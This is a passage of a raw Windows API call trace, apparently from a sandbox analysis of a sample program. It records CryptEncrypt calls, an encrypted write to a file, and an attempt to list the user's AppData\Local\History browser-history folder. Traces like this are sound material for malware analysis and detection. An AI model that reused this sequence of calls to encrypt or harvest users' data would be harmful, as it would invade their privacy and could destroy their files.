hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0168.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0168.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaabe8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0168.381] CryptEncrypt (in: hKey=0x9e1ef8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0168.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.381] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0168.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.381] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.381] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.381] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.381] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.382] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.382] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaab70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0168.382] CryptEncrypt (in: hKey=0x9e1ef8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a726a8*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a726a8*, pdwDataLen=0x8cef60*=0x8) returned 1 [0168.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.382] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0168.382] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.382] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0168.382] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.382] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.382] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0168.382] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.382] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0168.382] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.382] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.383] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.383] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.383] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0168.383] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0168.383] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0168.383] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0168.383] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0168.383] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.383] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.383] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.383] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.383] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.383] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.383] WriteFile (in: hFile=0x4fc, lpBuffer=0x2a72708*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72708*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0168.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.384] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0168.384] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0168.384] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0168.384] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0168.384] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0168.385] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.385] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0168.385] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.385] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0168.385] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0168.385] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0168.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaaa38, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0168.385] CryptDestroyKey (hKey=0x9e1ef8) returned 1 [0168.385] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0168.385] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0168.385] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0168.385] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0168.385] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0168.385] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0168.385] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0168.385] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0168.385] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0168.385] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0168.385] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0168.385] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0168.385] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0168.385] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0168.389] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0168.389] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0168.389] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0168.389] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0168.389] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0168.389] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0168.389] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0168.389] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0168.389] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0168.389] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.389] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0168.389] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.389] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0168.389] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.389] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.389] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0168.389] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.389] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0168.389] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.389] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.390] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.390] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.390] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0168.390] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0168.390] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0168.390] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0168.390] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0168.390] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.390] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.390] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0168.390] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.390] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0168.390] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0168.390] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0168.390] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0168.390] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0168.390] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0168.390] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0168.390] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0168.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0168.390] CryptReleaseContext (hProv=0x9bf330, dwFlags=0x0) returned 1 [0168.390] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.391] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.391] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0168.391] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.391] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0168.391] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0168.391] FreeLibrary (hLibModule=0x76390000) returned 1 [0168.391] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.391] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.391] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.391] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.391] CloseHandle (hObject=0x4fc) returned 1 [0168.392] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.392] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.392] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0168.392] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0168.392] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/History", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\History", lpFilePart=0x8cedf4*="History") returned 0x25 [0168.392] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\History" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\history")) returned 0x2416 [0168.392] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\History\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x120a58, ftLastAccessTime.dwLowDateTime=0x47558b, ftLastAccessTime.dwHighDateTime=0x1, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x4a8178, nFileSizeHigh=0x7626d180, nFileSizeLow=0x4, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="", cAlternateFileName="")) returned 0xffffffff [0168.393] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0168.393] GetLastError () returned 0x6 [0168.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0168.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0168.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0168.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0168.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0168.393] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0168.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0168.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0168.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0168.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0168.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0168.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0168.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0168.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0168.393] 